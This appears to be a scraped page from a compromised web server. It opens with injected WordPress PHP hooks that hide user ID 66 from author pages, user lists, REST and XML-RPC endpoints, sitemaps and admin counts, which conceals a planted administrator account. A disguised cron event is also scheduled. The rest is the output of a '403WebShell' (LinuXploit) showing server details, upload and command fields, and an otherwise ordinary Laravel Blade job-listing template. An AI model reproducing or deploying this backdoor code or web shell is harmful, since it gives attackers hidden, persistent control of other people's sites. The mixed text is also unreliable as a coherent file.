add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emaji/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/emaji/storage/framework/views/e30c78e5f11ac4bcced55920ad3bc84b.php
<?php $__env->startSection('content'); ?>
<div class="container py-5" style="min-height: 100vh;">
  <div class="d-flex align-items-center justify-content-between mb-4">
    <div>
     <p class="text-org"><?php echo e($organization->name); ?></p>
      <h1 class="fw-bold mb-1">Your Jobs</h1>
      <p class="text-muted mb-0">Manage your postings and their visibility. <span class="badge bg-info text-dark"><i class="bi bi-info-circle"></i> To delete a job, first deactivate it, then click Delete</span></p>
    </div>
    <div class="d-flex gap-2 align-items-center">
      <div class="form-check form-switch">
        <input class="form-check-input" type="checkbox" id="showAllToggle"
               <?php echo e($showAll ? 'checked' : ''); ?>

               onchange="window.location.href = this.checked ? '<?php echo e(route('employer.jobs', ['show_all' => 1])); ?>' : '<?php echo e(route('employer.jobs', ['show_all' => 0])); ?>'">
        <label class="form-check-label small" for="showAllToggle">
          Show inactive
        </label>
      </div>
      <a href="<?php echo e(route('jobs.wizard')); ?>" class="btn btn-outline-success">
        <i class="bi bi-magic"></i> Create with Wizard
      </a>
      <a href="<?php echo e(route('jobs.create')); ?>" class="btn btn-success">
        <i class="bi bi-plus-lg"></i> Create Job
      </a>
    </div>
  </div>

  <?php if(session('onboarding_success')): ?>
  <!-- Getting Started Slideshow -->
  <div class="card border-0 shadow-sm mb-4" id="gettingStartedCard">
    <div class="card-body p-4">
      <div class="d-flex justify-content-between align-items-start mb-3">
        <div>
          <h5 class="fw-bold mb-2">
            <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="currentColor" class="me-2" viewBox="0 0 16 16">
              <path d="M9.669.864 8 0 6.331.864l-1.858.282-.842 1.68-1.337 1.32L2.6 6l-.306 1.854 1.337 1.32.842 1.68 1.858.282L8 12l1.669-.864 1.858-.282.842-1.68 1.337-1.32L13.4 6l.306-1.854-1.337-1.32-.842-1.68L9.669.864zm1.196 1.193.684 1.365 1.086 1.072L12.387 6l.248 1.506-1.086 1.072-.684 1.365-1.51.229L8 10.874l-1.355-.702-1.51-.229-.684-1.365-1.086-1.072L3.614 6l-.25-1.506 1.087-1.072.684-1.365 1.51-.229L8 1.126l1.356.702 1.509.229z"/>
              <path d="M4 11.794V16l4-1 4 1v-4.206l-2.018.306L8 13.126 6.018 12.1 4 11.794z"/>
            </svg>
            <?php if($organization->isEmployer()): ?>
            Quick Start: Posting Your First Job
            <?php else: ?>
            Quick Start: Setting Up Your Courses
            <?php endif; ?>
          </h5>
          <p class="text-muted small mb-0">Step <span id="currentStep">1</span> of <span id="totalSteps">4</span></p>
        </div>
        <button type="button" class="btn-close" aria-label="Close" onclick="document.getElementById('gettingStartedCard').remove()"></button>
      </div>

      <!-- Progress Bar -->
      <div class="progress mb-4" style="height: 4px;">
        <div id="slideProgress" class="progress-bar bg-primary" role="progressbar" style="width: 25%"></div>
      </div>

      <!-- Slideshow Container -->
      <div id="slideshowContainer" style="min-height: 200px;">
        <?php if($organization->isEmployer()): ?>
          <!-- Employer Slides -->
          <div class="slide active" data-slide="1">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#4A6FA5" viewBox="0 0 16 16">
                <path d="M6.5 1A1.5 1.5 0 0 0 5 2.5V3H1.5A1.5 1.5 0 0 0 0 4.5v1.384l7.614 2.03a1.5 1.5 0 0 0 .772 0L16 5.884V4.5A1.5 1.5 0 0 0 14.5 3H11v-.5A1.5 1.5 0 0 0 9.5 1h-3zm0 1h3a.5.5 0 0 1 .5.5V3H6v-.5a.5.5 0 0 1 .5-.5z"/>
                <path d="M0 12.5A1.5 1.5 0 0 0 1.5 14h13a1.5 1.5 0 0 0 1.5-1.5V6.85L8.129 8.947a.5.5 0 0 1-.258 0L0 6.85v5.65z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Welcome to Job Posting!</h6>
            <p class="text-muted mb-0">With emaji, you can post healthcare jobs and automatically match them with qualified candidates based on verified credentials.</p>
          </div>

          <div class="slide" data-slide="2">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#A9B8A5" viewBox="0 0 16 16">
                <path d="M1 2.828c.885-.37 2.154-.769 3.388-.893 1.33-.134 2.458.063 3.112.752v9.746c-.935-.53-2.12-.603-3.213-.493-1.18.12-2.37.461-3.287.811V2.828zm7.5-.141c.654-.689 1.782-.886 3.112-.752 1.234.124 2.503.523 3.388.893v9.923c-.918-.35-2.107-.692-3.287-.81-1.094-.111-2.278-.039-3.213.492V2.687zM8 1.783C7.015.936 5.587.81 4.287.94c-1.514.153-3.042.672-3.994 1.105A.5.5 0 0 0 0 2.5v11a.5.5 0 0 0 .707.455c.882-.4 2.303-.881 3.68-1.02 1.409-.142 2.59.087 3.223.877a.5.5 0 0 0 .78 0c.633-.79 1.814-1.019 3.222-.877 1.378.139 2.8.62 3.681 1.02A.5.5 0 0 0 16 13.5v-11a.5.5 0 0 0-.293-.455c-.952-.433-2.48-.952-3.994-1.105C10.413.809 8.985.936 8 1.783z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">ESCO-Based Qualifications</h6>
            <p class="text-muted mb-0">Define job requirements using ESCO taxonomy - a European standard for skills and qualifications. This ensures accurate matching with candidates.</p>
          </div>

          <div class="slide" data-slide="3">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#EE6C4D" viewBox="0 0 16 16">
                <path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/>
                <path d="m10.97 4.97-.02.022-3.473 4.425-2.093-2.094a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-1.071-1.05z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Verified Credentials</h6>
            <p class="text-muted mb-0">Candidates present verifiable credentials from accredited education providers. No more manual credential verification!</p>
          </div>

          <div class="slide" data-slide="4">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#28a745" viewBox="0 0 16 16">
                <path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zm-3.97-3.03a.75.75 0 0 0-1.08.022L7.477 9.417 5.384 7.323a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-.01-1.05z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Ready to Start!</h6>
            <p class="text-muted mb-3">Click the button below to create your first job posting.</p>
            <div class="text-center">
              <a href="<?php echo e(route('jobs.create')); ?>" class="btn btn-primary">Create Your First Job</a>
            </div>
          </div>
        <?php else: ?>
          <!-- Education Provider Slides -->
          <div class="slide active" data-slide="1">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#4A6FA5" viewBox="0 0 16 16">
                <path d="M8.211 2.047a.5.5 0 0 0-.422 0l-7.5 3.5a.5.5 0 0 0 .025.917l7.5 3a.5.5 0 0 0 .372 0L14 7.14V13a1 1 0 0 0-1 1v2h3v-2a1 1 0 0 0-1-1V6.739l.686-.275a.5.5 0 0 0 .025-.917l-7.5-3.5Z"/>
                <path d="M4.176 9.032a.5.5 0 0 0-.656.327l-.5 1.7a.5.5 0 0 0 .294.605l4.5 1.8a.5.5 0 0 0 .372 0l4.5-1.8a.5.5 0 0 0 .294-.605l-.5-1.7a.5.5 0 0 0-.656-.327L8 10.466 4.176 9.032Z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Welcome to emaji Education!</h6>
            <p class="text-muted mb-0">As an education provider, you can issue verifiable credentials to your students using OpenBadges 3.0 and W3C standards.</p>
          </div>

          <div class="slide" data-slide="2">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#A9B8A5" viewBox="0 0 16 16">
                <path d="M1 2.828c.885-.37 2.154-.769 3.388-.893 1.33-.134 2.458.063 3.112.752v9.746c-.935-.53-2.12-.603-3.213-.493-1.18.12-2.37.461-3.287.811V2.828zm7.5-.141c.654-.689 1.782-.886 3.112-.752 1.234.124 2.503.523 3.388.893v9.923c-.918-.35-2.107-.692-3.287-.81-1.094-.111-2.278-.039-3.213.492V2.687zM8 1.783C7.015.936 5.587.81 4.287.94c-1.514.153-3.042.672-3.994 1.105A.5.5 0 0 0 0 2.5v11a.5.5 0 0 0 .707.455c.882-.4 2.303-.881 3.68-1.02 1.409-.142 2.59.087 3.223.877a.5.5 0 0 0 .78 0c.633-.79 1.814-1.019 3.222-.877 1.378.139 2.8.62 3.681 1.02A.5.5 0 0 0 16 13.5v-11a.5.5 0 0 0-.293-.455c-.952-.433-2.48-.952-3.994-1.105C10.413.809 8.985.936 8 1.783z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Course Setup</h6>
            <p class="text-muted mb-0">Map your courses to ESCO qualifications and define learning outcomes. This helps employers understand what skills your graduates have.</p>
          </div>

          <div class="slide" data-slide="3">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#EE6C4D" viewBox="0 0 16 16">
                <path d="M14 3a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1h12zM2 2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2H2z"/>
                <path d="M6.854 5.146a.5.5 0 1 0-.708.708L7.293 7 6.146 8.146a.5.5 0 1 0 .708.708L8 7.707l1.146 1.147a.5.5 0 0 0 .708-.708L8.707 7l1.147-1.146a.5.5 0 0 0-.708-.708L8 6.293 6.854 5.146z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Issue Credentials</h6>
            <p class="text-muted mb-0">When students complete courses, issue them cryptographically signed digital credentials that they can present to employers.</p>
          </div>

          <div class="slide" data-slide="4">
            <div class="text-center mb-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="#28a745" viewBox="0 0 16 16">
                <path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zm-3.97-3.03a.75.75 0 0 0-1.08.022L7.477 9.417 5.384 7.323a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-.01-1.05z"/>
              </svg>
            </div>
            <h6 class="fw-semibold mb-2">Next Steps</h6>
            <p class="text-muted mb-3">Contact us to set up your credential issuance workflow and get accredited.</p>
            <div class="text-center">
              <a href="mailto:support@emaji.net" class="btn btn-primary">Contact Support</a>
            </div>
          </div>
        <?php endif; ?>
      </div>

      <!-- Navigation -->
      <div class="d-flex justify-content-between align-items-center mt-3 pt-3 border-top">
        <button class="btn btn-sm btn-outline-secondary" id="prevSlide" disabled>
          <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M12 8a.5.5 0 0 1-.5.5H5.707l2.147 2.146a.5.5 0 0 1-.708.708l-3-3a.5.5 0 0 1 0-.708l3-3a.5.5 0 1 1 .708.708L5.707 7.5H11.5a.5.5 0 0 1 .5.5z"/>
          </svg>
          Previous
        </button>
        <button class="btn btn-sm btn-primary" id="nextSlide">
          Next
          <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M4 8a.5.5 0 0 1 .5-.5h5.793L8.146 5.354a.5.5 0 1 1 .708-.708l3 3a.5.5 0 0 1 0 .708l-3 3a.5.5 0 0 1-.708-.708L10.293 8.5H4.5A.5.5 0 0 1 4 8z"/>
          </svg>
        </button>
      </div>
    </div>
  </div>

  <script>
  document.addEventListener('DOMContentLoaded', function() {
    const slides = document.querySelectorAll('#gettingStartedCard .slide');
    const prevBtn = document.getElementById('prevSlide');
    const nextBtn = document.getElementById('nextSlide');
    const currentStepEl = document.getElementById('currentStep');
    const totalStepsEl = document.getElementById('totalSteps');
    const progressBar = document.getElementById('slideProgress');

    let currentSlide = 0;
    const totalSlides = slides.length;

    totalStepsEl.textContent = totalSlides;

    function updateSlideshow() {
      // Hide all slides
      slides.forEach((slide, index) => {
        slide.style.display = index === currentSlide ? 'block' : 'none';
        if (index === currentSlide) {
          slide.classList.add('active');
        } else {
          slide.classList.remove('active');
        }
      });

      // Update step counter
      currentStepEl.textContent = currentSlide + 1;

      // Update progress bar
      const progress = ((currentSlide + 1) / totalSlides) * 100;
      progressBar.style.width = progress + '%';

      // Update buttons
      prevBtn.disabled = currentSlide === 0;
      nextBtn.textContent = currentSlide === totalSlides - 1 ? 'Finish' : 'Next';

      if (currentSlide === totalSlides - 1) {
        nextBtn.innerHTML = 'Finish <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zm-3.97-3.03a.75.75 0 0 0-1.08.022L7.477 9.417 5.384 7.323a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-.01-1.05z"/></svg>';
      } else {
        nextBtn.innerHTML = 'Next <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 8a.5.5 0 0 1 .5-.5h5.793L8.146 5.354a.5.5 0 1 1 .708-.708l3 3a.5.5 0 0 1 0 .708l-3 3a.5.5 0 0 1-.708-.708L10.293 8.5H4.5A.5.5 0 0 1 4 8z"/></svg>';
      }
    }

    prevBtn.addEventListener('click', function() {
      if (currentSlide > 0) {
        currentSlide--;
        updateSlideshow();
      }
    });

    nextBtn.addEventListener('click', function() {
      if (currentSlide < totalSlides - 1) {
        currentSlide++;
        updateSlideshow();
      } else {
        // Last slide - close the card
        document.getElementById('gettingStartedCard').remove();
      }
    });

    // Initialize
    updateSlideshow();
  });
  </script>
  <?php endif; ?>

  <div class="card border-0 shadow">
    <div class="card-body p-0">
      <div class="table-responsive">
        <table class="table align-middle mb-0">
          <thead class="table-light">
            <tr>
              <th>Title</th>
              <th>Profession</th>
              <th>Location</th>
              <th>Status</th>
              <th>Updated</th>
              <th class="text-end">Actions</th>
            </tr>
          </thead>
          <tbody>
            <?php $__empty_1 = true; $__currentLoopData = $jobs; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $job): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); $__empty_1 = false; ?>
              <?php
                $status = $statusMap[$job->status] ?? ['label'=>'Unknown','class'=>'badge bg-dark'];
              ?>
              <tr>
                <td class="fw-semibold">
                  <?php echo e($job->title ?? '—'); ?>

                </td>
                <td>
                  <?php echo e(optional($job->profession)->title ?? '—'); ?>

                </td>
                <td>
                  <?php echo e($job->city ?? '—'); ?>, <?php echo e($job->country ?? '—'); ?>

                </td>
                <td>
                  
                  <form method="POST" action="<?php echo e(route('employer.jobs.toggleStatus', $job)); ?>" class="d-inline">
                    <?php echo csrf_field(); ?>
                    <div class="form-check form-switch mb-0">
                      <input class="form-check-input" type="checkbox" role="switch"
                             id="statusToggle<?php echo e($job->id); ?>"
                             <?php echo e($job->status == 1 ? 'checked' : ''); ?>

                             onchange="this.form.submit()"
                             title="<?php echo e($job->status == 1 ? 'Click to deactivate' : 'Click to activate'); ?>">
                      <label class="form-check-label small" for="statusToggle<?php echo e($job->id); ?>">
                        <?php echo e($job->status == 1 ? 'Active' : 'Inactive'); ?>

                      </label>
                    </div>
                  </form>
                </td>
                <td class="text-muted">
                  <?php echo e($job->updated_at?->format('Y-m-d H:i')); ?>

                </td>
                <td class="text-end">
                  <div class="d-flex gap-2 justify-content-end align-items-center">
                    <a href="<?php echo e(route('jobs.edit', $job)); ?>" class="btn btn-sm btn-primary">
                      <i class="bi bi-pencil"></i> Edit
                    </a>

                    
                    <?php if($job->status == 0): ?>
                      <form method="POST" action="<?php echo e(route('jobs.destroy', $job)); ?>" class="d-inline"
                            onsubmit="return confirm('Are you sure you want to permanently delete this job?\n\nThis action cannot be undone.');">
                        <?php echo csrf_field(); ?>
                        <?php echo method_field('DELETE'); ?>
                        <button type="submit" class="btn btn-sm btn-outline-danger" title="Delete job permanently">
                          <i class="bi bi-trash"></i> Delete
                        </button>
                      </form>
                    <?php endif; ?>
                  </div>
                </td>
              </tr>
            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); if ($__empty_1): ?>
              <tr>
                <td colspan="6" class="text-center text-muted p-4">
                  No jobs yet. Click “Create New Job” to post your first opening.
                </td>
              </tr>
            <?php endif; ?>
          </tbody>
        </table>
      </div>

      <div class="p-3">
        <?php echo e($jobs->links()); ?>

      </div>
    </div>
  </div>
</div>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /var/www/html/emaji/resources/views/employer/jobs.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit